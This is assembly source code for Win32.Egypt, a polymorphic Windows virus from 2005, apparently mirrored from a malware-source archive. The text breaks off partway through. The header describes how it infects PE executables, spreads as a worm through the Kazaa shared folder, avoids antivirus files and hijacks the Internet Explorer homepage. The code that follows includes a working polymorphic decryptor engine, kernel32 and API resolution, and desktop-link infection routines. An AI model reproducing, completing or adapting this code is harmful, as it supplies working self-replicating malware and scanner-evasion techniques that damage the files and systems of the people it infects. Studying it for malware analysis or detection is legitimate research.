mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-25 19:45:06 +00:00
2468 lines
69 KiB
NASM
2468 lines
69 KiB
NASM
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; (Ermm...I'd higly appreciate if someone would take the pain
|
|||
|
; of drawing a sphynx or a couple of pyramids here, because,
|
|||
|
; as you can see, not only my asm skills suck...)
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Win32.Egypt
|
|||
|
;
|
|||
|
; ~~~~~~~~~~~
|
|||
|
;
|
|||
|
; @2005 TOE-VX
|
|||
|
; ~~~~~~~~~~~~
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
; DISCLAIMER :
|
|||
|
; ~~~~~~~~~~ This is the source of a VIRUS, The author is not
|
|||
|
; responsible for any damage that may occur due to
|
|||
|
; the assembly of this file. Use it at your own risk.
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; * Targets : PE EXE Files.
|
|||
|
;
|
|||
|
; * Residence : Per Process Resident.
|
|||
|
;
|
|||
|
; * Hooked APIs : None.
|
|||
|
;
|
|||
|
; * Infection method : Every 8 seconds it will scan for directory change
|
|||
|
; and infects all files in new directory
|
|||
|
; this is a very efficient method to retrieve files.
|
|||
|
; The virus will also search for all exe files pointed
|
|||
|
; to by link files in the desktop and infect them.
|
|||
|
; Also the virus will infect all applications used
|
|||
|
; to open ZIP files. EXE files are infected by the
|
|||
|
; classical method of adding the viral body to the
|
|||
|
; section in the file.
|
|||
|
;
|
|||
|
; * EPO : None.
|
|||
|
;
|
|||
|
; * Polymorphism : Yes, The virus is polymorphic using its own engine.
|
|||
|
; The virus uses slow polymorphism, utilizing a single
|
|||
|
; decryptor for all files infected in the current run
|
|||
|
; of the infected process. The polymorphic engine utilizes
|
|||
|
; random registers, constructs calls to subroutines and
|
|||
|
; also features conditional and unconditional jumps with
|
|||
|
; non zero displacements. Yet it only utilizes a 32 bit
|
|||
|
; xor operation. Although i coded this engine from scratch,
|
|||
|
; i would like to thank GriYo, since i started writing
|
|||
|
; "real" polymorphic engines only after i examined his
|
|||
|
; 1996 Dos virus Implant.
|
|||
|
;
|
|||
|
; * Encryption : Yes, the virus is encrypted twice , the first decryptor
|
|||
|
; is that generated by the polymorphic engine and the other
|
|||
|
; decryptor is a fixed one with anti emulation trick.
|
|||
|
; The encryption algorithm is just meant to be effective
|
|||
|
; against scanners, not a one you would say much about.
|
|||
|
;
|
|||
|
; * Worming : Yes, the virus will infect all executables at the kazza
|
|||
|
; shared folder, thus being able to pass to other PCs and
|
|||
|
; thus exhibiting P2P worming, It will also create an
|
|||
|
; executable file there and infect it, the executable
|
|||
|
; file has a really attractive name ;) and a facked
|
|||
|
; message in case the user runs it.
|
|||
|
;
|
|||
|
; * Misc : Reserves file attributes and time, Marks infected files
|
|||
|
; Uses SEH to stabilize infected files
|
|||
|
; Avoids infecting AVs as it will not infect files
|
|||
|
; having AV,AN,DR,ID,OD,TB,F- in their names
|
|||
|
; Avoids Infecting system files and avoids infecting
|
|||
|
; DLLs misnamed as EXEs also doesn't infect compressed files
|
|||
|
; Those extra checks give the virus very good performance
|
|||
|
; and reduce error and corruption chances.
|
|||
|
;
|
|||
|
; * Payload : 1. On egyptian PCs it will display a funny message
|
|||
|
; the message is randomly chosen from twenty messages
|
|||
|
; the message will appear whenever an infected file
|
|||
|
; is executed with a one over twenty five probability.
|
|||
|
; I have included the english translations in the source
|
|||
|
; in case somebody is interested.
|
|||
|
;
|
|||
|
; 2. On non-egyptian PCs it will change IE default homepage
|
|||
|
; to the egyptain ministry of tourism webpage
|
|||
|
; http://www.Touregypt.net, This will take place on the
|
|||
|
; first and third friday of every month.
|
|||
|
;
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
; Version History:
|
|||
|
;=================
|
|||
|
;
|
|||
|
; 25-7-2005 version 1.0 finished
|
|||
|
;
|
|||
|
; 26-7-2005 Kaspersky detects version 1.0 , that's a really good job guys
|
|||
|
; keep it up ;) and as usual they misname the virus as "Gypet" which rather
|
|||
|
; sounds like a porn film title !! *^_^*
|
|||
|
;
|
|||
|
; 27-7-2005 version 1.2 that is a version 1.0 with slight code changes and
|
|||
|
; comments
|
|||
|
;
|
|||
|
; 29-7-2005 I upgraded the virus to version 1.5 by adding a polymorphic
|
|||
|
; engine.
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
; Things to be done in ver 2.0:
|
|||
|
;==============================
|
|||
|
;
|
|||
|
; 1- New anti emulation tricks
|
|||
|
; 2- ZIP infection
|
|||
|
; 3- More worming strategies
|
|||
|
; 4- SFC file protection awareness
|
|||
|
; 5- EPO
|
|||
|
; 6- Terminate AVers processes
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
; Greetings :
|
|||
|
; ~~~~~~~~~~~
|
|||
|
; Although almost everyone i will be greeting here has already quit writing
|
|||
|
; viruses since a very long time now, i would still like to express my
|
|||
|
; gratitude to them all.
|
|||
|
;
|
|||
|
; Nowhere Man : Everybody knows that VCL produced only lame viruses, yet its
|
|||
|
; commented sources were excellent to teach me assembly in a stupid country
|
|||
|
; lacking any books dedicated to assembly.
|
|||
|
;
|
|||
|
; Dark Angel : For presenting me to "real" Dos viruses.
|
|||
|
;
|
|||
|
; Neurobasher and vyvojar : For writing some of the best Dos viruses ever.
|
|||
|
;
|
|||
|
; 29A : For editing a really good virus magazine.
|
|||
|
;
|
|||
|
; Lord Julus : For being very friendly with me in our few email exchanges
|
|||
|
; and for writing very friendly and useful articles. ( I like Rammstein too ;)
|
|||
|
;
|
|||
|
; The Mental Driller : For being THE most ethical virus writter ever as well
|
|||
|
; as for writing some of the most complicated viruses ever.
|
|||
|
;
|
|||
|
; Zombie : For writing Mistfall.
|
|||
|
;
|
|||
|
; And greetings for all the other virus writers who exhibit ethical and
|
|||
|
; friendly attitude and for those who write advanced and complicated research
|
|||
|
; viruses.
|
|||
|
;
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
; * To Assemble :
|
|||
|
; ~~~~~~~~~~~~~~~
|
|||
|
; tasm32 -ml -m5 -q -zn egypt.asm
|
|||
|
; tlink32 -Tpe -c -x -aa egypt,,, import32
|
|||
|
; pewrsec egypt.exe
|
|||
|
;
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
|
|||
|
.386p
|
|||
|
.model flat
|
|||
|
JUMPS
|
|||
|
cmp_ macro reg,joff1
|
|||
|
inc reg
|
|||
|
jz joff1
|
|||
|
dec reg
|
|||
|
endm
|
|||
|
|
|||
|
apicall macro apioff
|
|||
|
call dword ptr [ebp+apioff]
|
|||
|
endm
|
|||
|
|
|||
|
.data
|
|||
|
mark equ 04Ch
|
|||
|
|
|||
|
section_flags equ 00000020h or 20000000h or 80000000h
|
|||
|
code_len equ code_end - code_start
|
|||
|
L equ <LARGE>
|
|||
|
GENERIC_READ equ 80000000h
|
|||
|
GENERIC_WRITE equ 40000000h
|
|||
|
GENERIC_READ_WRITE equ GENERIC_READ or GENERIC_WRITE
|
|||
|
OPEN_EXISTING equ 00000003h
|
|||
|
PAGE_READWRITE equ 00000004h
|
|||
|
PAGE_WRITECOPY equ 00000008h
|
|||
|
FILE_MAP_WRITE equ 00000002h
|
|||
|
FILE_SHARE_READ equ 00000001h
|
|||
|
FILE_ATTRIBUTE_NORMAL equ 00000080h
|
|||
|
FILE_ATTRIBUTE_DIRECTORY equ 00000010h
|
|||
|
FILE_BEGIN equ 00000000h
|
|||
|
HKEY_CURRENT_USER equ 80000001h
|
|||
|
KEY_SET_VALUE equ 00000002h
|
|||
|
REG_SZ equ 00000001h
|
|||
|
SPI_SETDESKWALLPAPER equ 00000020
|
|||
|
CREATE_ALWAYS equ 00000002h
|
|||
|
MB_ICONEXCLAMATION equ 00000030h
|
|||
|
|
|||
|
; Only hardcoded for 1st generation
|
|||
|
|
|||
|
kernel_ equ 0BFF70000h
|
|||
|
kernel_wNT equ 077F00000h
|
|||
|
shit_size equ delta-code_start
|
|||
|
|
|||
|
FILETIME struc
|
|||
|
dwLowDateTime dd ?
|
|||
|
dwHighDateTime dd ?
|
|||
|
FILETIME ends
|
|||
|
|
|||
|
WIN32_FIND_DATA struc
|
|||
|
dwFileAttributes dd ?
|
|||
|
ftCreationTime FILETIME ?
|
|||
|
ftLastAccessTime FILETIME ?
|
|||
|
ftLastWriteTime FILETIME ?
|
|||
|
nFileSizeHigh dd ?
|
|||
|
nFileSizeLow dd ?
|
|||
|
dwReserved0 dd ?
|
|||
|
dwReserved1 dd ?
|
|||
|
cFileName db 260 dup (?)
|
|||
|
cAlternateFileName db 14 dup (?)
|
|||
|
WIN32_FIND_DATA ends
|
|||
|
|
|||
|
SYSTEMTIME struc
|
|||
|
wYear dw ?
|
|||
|
wMonth dw ?
|
|||
|
wDayOfWeek dw ?
|
|||
|
wDay dw ?
|
|||
|
wHour dw ?
|
|||
|
wMinute dw ?
|
|||
|
wSecond dw ?
|
|||
|
wMilliseconds dw ?
|
|||
|
SYSTEMTIME ends
|
|||
|
|
|||
|
; Functions imported by Generation-1 -
|
|||
|
extrn ExitProcess:PROC
|
|||
|
extrn GetModuleHandleA:PROC
|
|||
|
extrn MessageBoxA:PROC
|
|||
|
|
|||
|
; Some dummy data for Generation-1 -
|
|||
|
.data
|
|||
|
dummy dd 0
|
|||
|
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
; CODE -
|
|||
|
;----------------------------------------------------------------------------
|
|||
|
.code
|
|||
|
code_start:
|
|||
|
call poly_dec
|
|||
|
poly_enc:
|
|||
|
popfd
|
|||
|
popad
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
|
|||
|
call decrypt
|
|||
|
enc:
|
|||
|
|
|||
|
call delta_
|
|||
|
delta: db "Win32.Egypt v 1.5",0
|
|||
|
db "(c) 2005 TOE-VX. Dedicated to my friends RNT and TRT.",0
|
|||
|
db "A Big F#@! you to all the terrorists who commited"
|
|||
|
db " the sharm massacre."
|
|||
|
delta_: pop ebp
|
|||
|
mov eax,ebp
|
|||
|
sub ebp,offset delta
|
|||
|
|
|||
|
sub eax,shit_size
|
|||
|
sub eax,00001000h
|
|||
|
NewEIP equ $-4
|
|||
|
mov dword ptr [ebp+module_base],eax
|
|||
|
|
|||
|
; Constructing SEH will allow the virus to run smoothly and stabilize
|
|||
|
; infected files against crashes.
|
|||
|
|
|||
|
call ChangeSEH
|
|||
|
mov esp,[esp+08h]
|
|||
|
jmp RestoreSEH
|
|||
|
ChangeSEH:
|
|||
|
xor ebx,ebx
|
|||
|
push dword ptr fs:[ebx]
|
|||
|
mov fs:[ebx],esp
|
|||
|
|
|||
|
; Now we will get kernel 32 address
|
|||
|
mov esi,[esp+2Ch]
|
|||
|
and esi,0FFFF0000h
|
|||
|
mov ecx,5
|
|||
|
call GetK32
|
|||
|
|
|||
|
mov dword ptr [ebp+kernel],eax
|
|||
|
|
|||
|
; Now get the APIs
|
|||
|
lea esi,[ebp+@@NamezCRC32]
|
|||
|
lea edi,[ebp+@@Offsetz]
|
|||
|
call GetAPIs
|
|||
|
|
|||
|
; Initialize random number generator
|
|||
|
call irandom32
|
|||
|
|
|||
|
; Generate a polymorphic decryptor
|
|||
|
call Poly
|
|||
|
jc RestoreSEH
|
|||
|
|
|||
|
; Infect all applications used to deal with ZIP files and infect the
|
|||
|
; Kazza shared folder, if any.
|
|||
|
mov eax,[ori_eip+ebp]
|
|||
|
mov [tmp_eip+ebp],eax
|
|||
|
call infectzippers
|
|||
|
mov eax,[tmp_eip+ebp]
|
|||
|
mov [ori_eip+ebp],eax
|
|||
|
|
|||
|
; Infect all the files pointed to by links on the desktop
|
|||
|
mov eax,[ori_eip+ebp]
|
|||
|
mov [tmp_eip+ebp],eax
|
|||
|
call infectlinks
|
|||
|
mov eax,[tmp_eip+ebp]
|
|||
|
mov [ori_eip+ebp],eax
|
|||
|
|
|||
|
|
|||
|
; Launch a thread that will detect directory changes and infect files
|
|||
|
; in new directories
|
|||
|
call LaunchVirusMainThread
|
|||
|
|
|||
|
; Get the Message box API address, if we fail we will skip the payload
|
|||
|
mov eax,offset u32_string
|
|||
|
add eax,ebp
|
|||
|
call VxGetModuleHandle
|
|||
|
or eax,eax
|
|||
|
je RestoreSEH
|
|||
|
mov [user32+ebp],eax
|
|||
|
|
|||
|
mov edx,offset msgbox_string
|
|||
|
add edx,ebp
|
|||
|
mov eax,[user32+ebp]
|
|||
|
call VxGetProcAddress
|
|||
|
or eax,eax
|
|||
|
je RestoreSEH
|
|||
|
mov [_MessageBoxA+ebp],eax
|
|||
|
|
|||
|
; Check if we should make a payload or not and do it if necessary
|
|||
|
call payload ;N.B. payload must be after zip infection
|
|||
|
;as adavapi dll must be loaded
|
|||
|
; Restore SEH and jump back to host
|
|||
|
RestoreSEH:
|
|||
|
xor ebx,ebx
|
|||
|
pop dword ptr fs:[ebx]
|
|||
|
pop eax
|
|||
|
|
|||
|
popfd
|
|||
|
popad
|
|||
|
|
|||
|
mov ebx,12345678h
|
|||
|
org $-4
|
|||
|
ori_eip dd offset g1_quit - 400000h
|
|||
|
|
|||
|
add ebx,12345678h
|
|||
|
org $-4
|
|||
|
module_base dd 00400000h
|
|||
|
|
|||
|
push ebx
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
; P O L Y E N G I N E
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
Poly:
|
|||
|
push 00000040h
|
|||
|
push 00001000h OR 00002000h
|
|||
|
push 00001000h
|
|||
|
push 0h
|
|||
|
call dword ptr [_VirtualAlloc+ebp]
|
|||
|
or eax,eax
|
|||
|
jne contpoly
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
decplace dd 0h
|
|||
|
dec_len dd 0h
|
|||
|
viruslen dd 0h
|
|||
|
keyy db 00h, 00h, 00h, 00h
|
|||
|
contpoly:
|
|||
|
mov dword ptr [ebp+decplace],eax
|
|||
|
push eax
|
|||
|
pop edi
|
|||
|
; now edi points to place to put decryptor
|
|||
|
; we want to generate a decryptor that looks like this :
|
|||
|
; pop reg1
|
|||
|
; push reg1
|
|||
|
; xor reg2,reg2
|
|||
|
; mov reg3,key
|
|||
|
;dec_loop:
|
|||
|
; xor dword ptr [reg1],reg3
|
|||
|
; add reg1,4h
|
|||
|
; inc reg2
|
|||
|
; cmp reg2,((decrypt-enc)/4)+1
|
|||
|
; jne dec_loop
|
|||
|
; ret
|
|||
|
|
|||
|
no_reg1_ebp:
|
|||
|
call getfreg ;gen pop reg1
|
|||
|
cmp al,5
|
|||
|
je no_reg1_ebp
|
|||
|
|
|||
|
mov byte ptr [ebp+regs],al
|
|||
|
mov al,byte ptr[pops+eax+ebp]
|
|||
|
stosb
|
|||
|
mov ax,09c60h ;gen pushad&pushfd
|
|||
|
stosw
|
|||
|
|
|||
|
mov dword ptr [ebp+regs+1],0
|
|||
|
|
|||
|
call garble
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr[ebp+regs]
|
|||
|
mov al,byte ptr[pushs+eax+ebp]
|
|||
|
stosb
|
|||
|
call garble
|
|||
|
|
|||
|
xor eax,eax ;gen xor/sub reg2,reg2
|
|||
|
mov al,06h
|
|||
|
call rndeax
|
|||
|
cmp al,3h
|
|||
|
jbe @xor
|
|||
|
mov al,02bh
|
|||
|
jmp @skipxor
|
|||
|
@xor:
|
|||
|
mov al,033h
|
|||
|
@skipxor:
|
|||
|
stosb
|
|||
|
xor eax,eax
|
|||
|
call getfreg
|
|||
|
mov byte ptr [ebp+regs+1],al
|
|||
|
mov bl,al
|
|||
|
push ecx
|
|||
|
mov cl,3
|
|||
|
shl al,cl
|
|||
|
pop ecx
|
|||
|
add al,0c0h
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
call garble
|
|||
|
|
|||
|
call getfreg ;gen mov reg3,key
|
|||
|
mov byte ptr [ebp+regs+2],al
|
|||
|
add al,0b8h
|
|||
|
stosb
|
|||
|
call random32
|
|||
|
mov word ptr[ebp+keyy],ax
|
|||
|
stosw
|
|||
|
call random32
|
|||
|
mov word ptr[ebp+keyy+2],ax
|
|||
|
stosw
|
|||
|
call garble
|
|||
|
|
|||
|
mov dword ptr[ebp+loopplace],edi ; we will be loping
|
|||
|
; here
|
|||
|
call garble
|
|||
|
mov al,31h ; gen xor[reg],reg
|
|||
|
stosb
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr [ebp+regs+2]
|
|||
|
push ecx
|
|||
|
mov cl,3
|
|||
|
shl al,cl
|
|||
|
pop ecx
|
|||
|
mov ebx,eax
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr [ebp+regs]
|
|||
|
add eax,ebx
|
|||
|
stosb
|
|||
|
call garble
|
|||
|
|
|||
|
mov al,083h ;gen add reg1,4
|
|||
|
stosb
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr [ebp+regs]
|
|||
|
add ax,04c0h
|
|||
|
stosw
|
|||
|
call garble
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr [ebp+regs+1]
|
|||
|
add al,40h
|
|||
|
stosb
|
|||
|
call garble
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov al,byte ptr [ebp+regs+1]
|
|||
|
cmp al,0
|
|||
|
jne @nf_eax
|
|||
|
mov al,3dh
|
|||
|
stosb
|
|||
|
jmp @conttt
|
|||
|
|
|||
|
@nf_eax:
|
|||
|
xchg al,ah
|
|||
|
mov al,81h
|
|||
|
stosb
|
|||
|
xchg al,ah
|
|||
|
add al, 0f8h
|
|||
|
stosb
|
|||
|
@conttt:
|
|||
|
|
|||
|
mov eax,((poly_end-poly_enc)/4)+1
|
|||
|
stosw
|
|||
|
xor eax,eax
|
|||
|
stosw
|
|||
|
mov ax,0574h
|
|||
|
stosw
|
|||
|
mov al,0e9h
|
|||
|
stosb
|
|||
|
mov eax,dword ptr[ebp+loopplace]
|
|||
|
sub eax,edi
|
|||
|
sub eax,4h ; ??
|
|||
|
mov dword ptr[edi],eax
|
|||
|
inc edi
|
|||
|
inc edi
|
|||
|
inc edi
|
|||
|
inc edi
|
|||
|
|
|||
|
|
|||
|
call garble
|
|||
|
mov al,0c3h ;return
|
|||
|
stosb
|
|||
|
call garble
|
|||
|
|
|||
|
mov ecx,edi
|
|||
|
sub ecx, dword ptr [ebp+decplace]
|
|||
|
mov dword ptr [ebp+dec_len],ecx
|
|||
|
mov dword ptr [ebp+viruslen],code_len
|
|||
|
add dword ptr [ebp+viruslen],ecx
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
pushs:
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
push ebx
|
|||
|
push esp ;won't be used , naturally
|
|||
|
push ebp
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
end_pushs:
|
|||
|
|
|||
|
pops:
|
|||
|
pop eax
|
|||
|
pop ecx
|
|||
|
pop edx
|
|||
|
pop ebx
|
|||
|
pop esp
|
|||
|
pop ebp
|
|||
|
pop esi
|
|||
|
pop edi
|
|||
|
end_pops:
|
|||
|
|
|||
|
garble:
|
|||
|
mov eax,((offset choices_end-choices)/4)
|
|||
|
call rndeax
|
|||
|
shl eax,2
|
|||
|
add eax,ebp
|
|||
|
add eax,offset choices
|
|||
|
mov eax,[eax]
|
|||
|
add eax,ebp
|
|||
|
call eax
|
|||
|
ret
|
|||
|
|
|||
|
choices:
|
|||
|
dd offset garblock
|
|||
|
dd offset pushpop
|
|||
|
dd offset abs_jmp
|
|||
|
dd offset backcall
|
|||
|
dd offset cond_jmp
|
|||
|
dd offset cond_shit
|
|||
|
choices_end:
|
|||
|
|
|||
|
jmplocation dd 0h
|
|||
|
calllocation dd 0h
|
|||
|
|
|||
|
cond_jmp:
|
|||
|
xor eax,eax
|
|||
|
mov al,10h
|
|||
|
call rndeax
|
|||
|
add al,070h
|
|||
|
stosb
|
|||
|
stosb
|
|||
|
mov dword ptr [ebp+jmplocation],edi
|
|||
|
call garblock
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+jmplocation]
|
|||
|
sub eax,edi
|
|||
|
|
|||
|
push edi
|
|||
|
mov edi,dword ptr [ebp+jmplocation]
|
|||
|
dec edi
|
|||
|
neg al
|
|||
|
stosb
|
|||
|
pop edi
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
backcall:
|
|||
|
mov al,0ebh
|
|||
|
stosb
|
|||
|
stosb
|
|||
|
mov dword ptr [ebp+jmplocation],edi
|
|||
|
call abs_shit
|
|||
|
mov dword ptr [ebp+calllocation],edi
|
|||
|
call garblock
|
|||
|
mov al,0c3h
|
|||
|
stosb
|
|||
|
call abs_shit
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+jmplocation]
|
|||
|
sub eax,edi
|
|||
|
|
|||
|
push edi
|
|||
|
mov edi,dword ptr [ebp+jmplocation]
|
|||
|
dec edi
|
|||
|
neg al
|
|||
|
stosb
|
|||
|
pop edi
|
|||
|
|
|||
|
mov al,0e8h
|
|||
|
stosb
|
|||
|
mov eax,(0ffffh -3h)
|
|||
|
sub eax,edi
|
|||
|
add eax,dword ptr [ebp+calllocation]
|
|||
|
stosw
|
|||
|
mov ax,0ffffh
|
|||
|
stosw
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
cond_shit:
|
|||
|
xor eax,eax
|
|||
|
mov al,80h
|
|||
|
call rndeax
|
|||
|
cmp al,40h
|
|||
|
je stc_
|
|||
|
mov ax,073f8h
|
|||
|
stosw
|
|||
|
call abs_shit
|
|||
|
ret
|
|||
|
stc_:
|
|||
|
mov ax,072f9h
|
|||
|
stosw
|
|||
|
call abs_shit
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
abs_jmp:
|
|||
|
mov al,0ebh
|
|||
|
stosb
|
|||
|
call abs_shit
|
|||
|
ret
|
|||
|
|
|||
|
abs_shit:
|
|||
|
mov eax,20h
|
|||
|
call rndeax
|
|||
|
stosb
|
|||
|
mov ecx,eax
|
|||
|
shitloop:
|
|||
|
push ecx
|
|||
|
call random32
|
|||
|
pop ecx
|
|||
|
stosb
|
|||
|
loop shitloop
|
|||
|
ret
|
|||
|
|
|||
|
pushpop:
|
|||
|
call getreg
|
|||
|
add eax,ebp
|
|||
|
add eax,offset pushs
|
|||
|
mov al,byte ptr [eax]
|
|||
|
stosb
|
|||
|
call garblock
|
|||
|
call getfreg
|
|||
|
add eax,ebp
|
|||
|
add eax,offset pops
|
|||
|
mov al,byte ptr [eax]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
garblock:
|
|||
|
xor eax,eax
|
|||
|
mov al,7h
|
|||
|
call rndeax
|
|||
|
add al,3
|
|||
|
mov ecx,eax
|
|||
|
loph:
|
|||
|
push ecx
|
|||
|
call garbage
|
|||
|
pop ecx
|
|||
|
loop loph
|
|||
|
ret
|
|||
|
|
|||
|
garbage:
|
|||
|
xor eax,eax
|
|||
|
mov al,100
|
|||
|
call rndeax
|
|||
|
cmp al,30 ;30% reg imm
|
|||
|
jbe regimm
|
|||
|
cmp al,40 ;10% rem mem
|
|||
|
jbe regmem
|
|||
|
cmp al,50 ;10% one byte
|
|||
|
jbe onebyte
|
|||
|
jmp regreg ;50% reg reg
|
|||
|
|
|||
|
onebyte:
|
|||
|
mov eax,offset one_end-one
|
|||
|
call rndeax
|
|||
|
mov ebx,eax
|
|||
|
add ebx,ebp
|
|||
|
add ebx,offset one
|
|||
|
mov al,byte ptr [ebx]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
regmem:
|
|||
|
mov eax,offset (etwobitinstrs- twobitinstrs)
|
|||
|
call rndeax
|
|||
|
mov ecx,offset twobitinstrs
|
|||
|
add ecx,eax
|
|||
|
mov al,byte ptr [ecx+ebp]
|
|||
|
or al,al
|
|||
|
je regmem
|
|||
|
stosb
|
|||
|
|
|||
|
call getfreg
|
|||
|
mov ecx,3
|
|||
|
shl al,cl
|
|||
|
|
|||
|
mov ebx,eax
|
|||
|
mov al,08h
|
|||
|
mov al,byte ptr [ebp+regs]
|
|||
|
add eax,ebx
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
regimm:
|
|||
|
;generate op reg,imm (eax not included)
|
|||
|
mov al,81h
|
|||
|
stosb
|
|||
|
mov al,8
|
|||
|
call rndeax
|
|||
|
push ecx ;we now need to make *8
|
|||
|
xor ecx,ecx
|
|||
|
mov cl,3
|
|||
|
shl al,cl
|
|||
|
pop ecx
|
|||
|
add al,0c1h
|
|||
|
mov ebx,eax
|
|||
|
call getfreg
|
|||
|
dec eax ;coz eax has no opcode
|
|||
|
add eax,ebx
|
|||
|
|
|||
|
stosb
|
|||
|
call random32
|
|||
|
stosw
|
|||
|
call random32
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
regreg:
|
|||
|
;generate op reg,reg
|
|||
|
mov eax, offset (etwobitinstrs- twobitinstrs)
|
|||
|
call rndeax
|
|||
|
xor ebx,ebx
|
|||
|
mov bl,al
|
|||
|
add ebx,offset twobitinstrs
|
|||
|
add ebx,ebp
|
|||
|
mov al,byte ptr [ebx]
|
|||
|
or al,al
|
|||
|
je regreg
|
|||
|
stosb
|
|||
|
call getfreg
|
|||
|
push ecx
|
|||
|
mov cl,3
|
|||
|
shl al,cl
|
|||
|
pop ecx
|
|||
|
mov ebx,eax
|
|||
|
add bl,0c0h
|
|||
|
call getfreg
|
|||
|
add bl,al
|
|||
|
xchg eax,ebx
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
getfreg: ;get free reg
|
|||
|
xor eax,eax
|
|||
|
f_esp:
|
|||
|
mov al,8
|
|||
|
call rndeax
|
|||
|
cmp al,4
|
|||
|
je f_esp
|
|||
|
cmp byte ptr[ebp+regs],al
|
|||
|
je f_esp
|
|||
|
cmp byte ptr[ebp+regs+1],al
|
|||
|
je f_esp
|
|||
|
cmp byte ptr[ebp+regs+2],al
|
|||
|
je f_esp
|
|||
|
ret
|
|||
|
getreg:
|
|||
|
xor eax,eax
|
|||
|
mov al,8
|
|||
|
call rndeax
|
|||
|
ret
|
|||
|
|
|||
|
loopplace dd 0h
|
|||
|
fromhere dd 0h
|
|||
|
regs:
|
|||
|
db 0
|
|||
|
db 0
|
|||
|
db 0
|
|||
|
|
|||
|
twobitinstrs:
|
|||
|
db 23h ;and
|
|||
|
db 3bh ;cmp
|
|||
|
db 0bh ;or
|
|||
|
db 8bh ;mov
|
|||
|
db 33h ;xor
|
|||
|
db 03h ;add
|
|||
|
db 2bh ;sub
|
|||
|
etwobitinstrs:
|
|||
|
|
|||
|
one:
|
|||
|
NOP
|
|||
|
CLC
|
|||
|
STC
|
|||
|
one_end:
|
|||
|
|
|||
|
; POLY ENGINE ENDS HERE
|
|||
|
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Infect all files pointed to by links on the desktop
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
infectlinks:
|
|||
|
mov edi,ebp
|
|||
|
add edi,offset olddir
|
|||
|
mov al,0
|
|||
|
mov ecx,128
|
|||
|
rep stosb
|
|||
|
push ebp
|
|||
|
push L 128
|
|||
|
mov eax,ebp
|
|||
|
add eax,offset olddir
|
|||
|
push eax
|
|||
|
call [_GetWindowsDirectoryA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
mov edi,ebp
|
|||
|
add edi,offset olddir
|
|||
|
add edi,eax
|
|||
|
mov esi,ebp
|
|||
|
add esi,offset desktop
|
|||
|
mov ecx,9
|
|||
|
rep movsb
|
|||
|
|
|||
|
push ebp
|
|||
|
mov eax,ebp
|
|||
|
add eax,offset currdir
|
|||
|
push eax
|
|||
|
push L 128
|
|||
|
call [_GetCurrentDirectoryA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset olddir
|
|||
|
push edx
|
|||
|
call [ebp+_SetCurrentDirectoryA]
|
|||
|
|
|||
|
call searchlinks
|
|||
|
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset currdir
|
|||
|
push edx
|
|||
|
call [ebp+_SetCurrentDirectoryA]
|
|||
|
ret
|
|||
|
|
|||
|
searchlinks:
|
|||
|
push ebp
|
|||
|
mov eax,offset wfd
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax,offset lnk_match
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
call [_FindFirstFileA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
inc eax
|
|||
|
or eax,eax
|
|||
|
je icd_end2
|
|||
|
dec eax
|
|||
|
